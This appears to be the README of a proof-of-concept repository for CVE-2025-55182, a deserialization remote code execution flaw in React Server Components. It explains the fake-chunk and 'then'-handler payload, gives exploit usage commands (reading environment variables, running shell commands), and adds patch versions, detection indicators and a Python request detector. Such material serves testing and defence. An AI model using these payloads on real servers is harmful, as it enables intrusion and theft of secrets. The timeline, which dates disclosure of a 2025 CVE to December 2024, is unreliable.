This repository contains a proof of concept for CVE-2025-55182, a critical remote code execution vulnerability in React Server Components. This is for authorized security testing and research purposes only.
- CVE ID: CVE-2025-55182
- Name: React2Shell
- CVSS Score: 10.0 (CRITICAL)
- Type: CWE-502 - Deserialization of Untrusted Data
- Attack Vector: Network (AV:N)
- Authentication: None Required (PR:N)
- Status: Active exploitation in the wild
Affected React versions:
- 19.0.0
- 19.1.0, 19.1.1
- 19.2.0

Affected Next.js versions:
- 15.0.0 to 15.0.4
- 15.1.0 to 15.1.8
- 15.2.0 to 15.2.5
- 16.0.0 to 16.0.6
The vulnerability exploits unsafe deserialization in the React Server Components Flight protocol. When a server receives a specially crafted payload, it fails to properly validate the structure before deserializing, allowing attacker-controlled data to manipulate server-side execution.
- Fake Chunk Injection: the attacker sends a Flight payload with a crafted object mimicking the internal Chunk structure
- Promise Handler Hijacking: the fake object includes a custom `then` method
- State Manipulation: React's deserialization attempts to resolve the fake Chunk, triggering the attacker's handler
- Code Execution: arbitrary JavaScript executes on the server via `process.mainModule.require('child_process')`
Prerequisites:
- Node.js 18+
- Python 3.x (for the exploit script)
- npm or yarn

Setup:
- Install dependencies: `npm install`
- Start the vulnerable server: `npm run dev`

The server will start on http://localhost:3000
app/
├── page.js # Main page with ServerForm
├── ServerForm.js # Client component with form
├── actions.js # Vulnerable Server Action
└── layout.js # Root layout
For a detailed exploitation guide, including the interactive shell and advanced features, see more-about-exploit.md
Usage:

```
python3 exploit.py -t http://localhost:3000 -c "whoami"
```

Options:
- -t, --target: target URL (required)
- -c, --command: shell command to execute (default: id)
- --check-only: only check whether the target appears vulnerable

Check if the target is vulnerable:

```
python3 exploit.py -t http://localhost:3000 --check-only
```

Execute arbitrary commands:

```
# Get user info
python3 exploit.py -t http://localhost:3000 -c "id"
# List files
python3 exploit.py -t http://localhost:3000 -c "ls -la"
# Create a file as POC
python3 exploit.py -t http://localhost:3000 -c "touch /tmp/pwned"
# Read environment variables
python3 exploit.py -t http://localhost:3000 -c "env"
```

The exploit uses multipart form-data with:
- Field "0": malicious JSON with a custom `then` handler
- Field "1": reference to field 0 (`$@0`)
- Header `Next-Action: x` (triggers RSC processing)

The payload manipulates the internal `_response` object to execute:
```
process.mainModule.require("child_process").execSync("<command>");
```

- Update React: `npm install react@19.3.0 react-dom@19.3.0`
- Update Next.js: `npm install next@15.2.6` (or the latest patched version)
Patched versions:
- React: ≥ 19.3.0
- Next.js:
  - ≥ 15.0.5
  - ≥ 15.1.9
  - ≥ 15.2.6
  - ≥ 16.0.7
- Unexpected POST requests to RSC endpoints with a `Next-Action` header
- Multipart form-data payloads with `$@` references
- Suspicious `then` properties in request bodies
- Server-side process execution anomalies

Request signature:

```
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data
...containing {"then":"$@
```
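As an added defensive example (not part of this repository or of the exploit script), the following Python checks a raw HTTP request against the indicators listed above and only flags a Server Action call when the body also carries the deserialization markers; the request parser, the `multipart_body` helper and both sample requests are constructed here.

```python
import re

# Indicator patterns for the signature listed above (constructed here; not part of the project).
FLIGHT_REF = re.compile(r"\$@\d+")     # Flight reference tokens such as $@0
THEN_KEY = re.compile(r'"then"\s*:')   # a JSON "then" property inside a form field


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, headers, body); header names are lower-cased."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ")[0], headers, body


def inspect_request(raw):
    """Return (suspicious, matched indicators) for one raw request."""
    method, headers, body = parse_request(raw)
    action = method == "POST" and "next-action" in headers
    multipart = "multipart/form-data" in headers.get("content-type", "")
    ref = bool(FLIGHT_REF.search(body))
    then = bool(THEN_KEY.search(body))
    hits = [name for name, hit in (("POST with Next-Action header", action),
                                   ("multipart/form-data body", multipart),
                                   ("$@ reference in body", ref),
                                   ('"then" property in body', then)) if hit]
    # Legitimate Server Actions also send Next-Action over multipart, so only the
    # body indicators ($@ reference or "then" property) turn an action call into a finding.
    return action and (ref or then), hits


def multipart_body(boundary, fields):
    """Build a multipart/form-data body from {field name: value} (used for the samples below)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return "".join(parts) + f"--{boundary}--\r\n"


# Constructed sample requests, not captured traffic: one matching the signature, one benign action call.
HEAD = ("POST / HTTP/1.1\r\nHost: localhost:3000\r\nNext-Action: x\r\n"
        "Content-Type: multipart/form-data; boundary=XX\r\n\r\n")
SUSPICIOUS_REQUEST = HEAD + multipart_body("XX", {"0": '{"then":"$@1"}', "1": "$@0"})
BENIGN_REQUEST = HEAD + multipart_body("XX", {"0": '["hello"]'})

if __name__ == "__main__":
    for label, req in (("suspicious", SUSPICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_request(req))
```

The same function can be run over request bodies captured by a reverse proxy or WAF log; matching only on the `Next-Action` header would alert on every legitimate Server Action.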
- December 3, 2024: Public disclosure
- December 5, 2024: Active exploitation observed
- December 26, 2024: CISA KEV compliance deadline
This proof of concept is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse of this information.
DO NOT:
- Use this exploit against systems you don't own or have explicit permission to test
- Deploy this in production environments
- Share exploit code without proper context and warnings
MIT License - For Security Research Purposes Only